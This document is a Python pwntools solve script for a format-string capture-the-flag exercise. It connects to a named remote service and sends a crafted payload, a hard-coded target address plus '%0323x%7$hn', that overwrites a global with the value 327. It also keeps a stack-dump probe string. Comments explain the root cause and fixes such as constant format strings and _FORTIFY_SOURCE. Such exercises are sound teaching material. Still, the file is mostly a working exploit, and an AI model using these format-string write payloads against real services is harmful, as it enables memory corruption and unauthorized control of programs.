from pwn import remote, process, p32
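# Solve script for a format-string exercise (binary name "04_match_value",
# taken from the local-debug line below).
#
# Root cause on the service side: client input reaches a printf-family call as
# the format string itself, so conversions such as %x and %n are interpreted.
# The fix is a constant format string (printf("%s", buf)). Building with
# -Wformat -Wformat-security flags the pattern, and glibc's _FORTIFY_SOURCE=2
# aborts on %n when the format string lives in writable memory.
HOST = "mustard.stt.rnl.tecnico.ulisboa.pt"
PORT = 25194

conn = remote(HOST, PORT)
# Local-debug alternative: run the binary directly and pause so a debugger can
# be attached before the payload is sent.
#conn = process("04_match_value")
#input()

# Little-endian 32-bit pointer placed at the very start of the input.
# NOTE(review): presumably the address of the global the challenge compares
# against; a hard-coded address only holds for a non-PIE build - confirm.
tgt_addr = p32(0x804c040)

# Value to store is 327. The 4 pointer bytes above are already counted as
# output, so the padded %x contributes the remaining 323 characters:
# 327 - 4(ptr) = 323
# %7$hn then stores the running output count as a 16-bit value through the
# 7th printf argument, which is expected to be the pointer above.
pl = tgt_addr + b"%0323x%7$hn\n"
# Stack-dump probe kept for reference; presumably how argument index 7 was
# determined (the AAAA marker shows up in the printed words).
#pl = "AAAA.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x\n"

conn.send(pl)

# Echo the service's reply one byte at a time so partial output is visible
# immediately. pwntools raises EOFError from recv() once the peer closes the
# stream; that is the expected end of the session, not a failure, so it ends
# the loop instead of surfacing as a traceback.
try:
    while conn.connected():
        chunk = conn.recv(1)
        if not chunk:
            # recv() returns b"" on timeout; nothing to print yet.
            continue
        print(chr(chunk[0]), end="", flush=True)
except EOFError:
    pass
finally:
    # Release the socket even if printing or receiving failed part-way.
    conn.close()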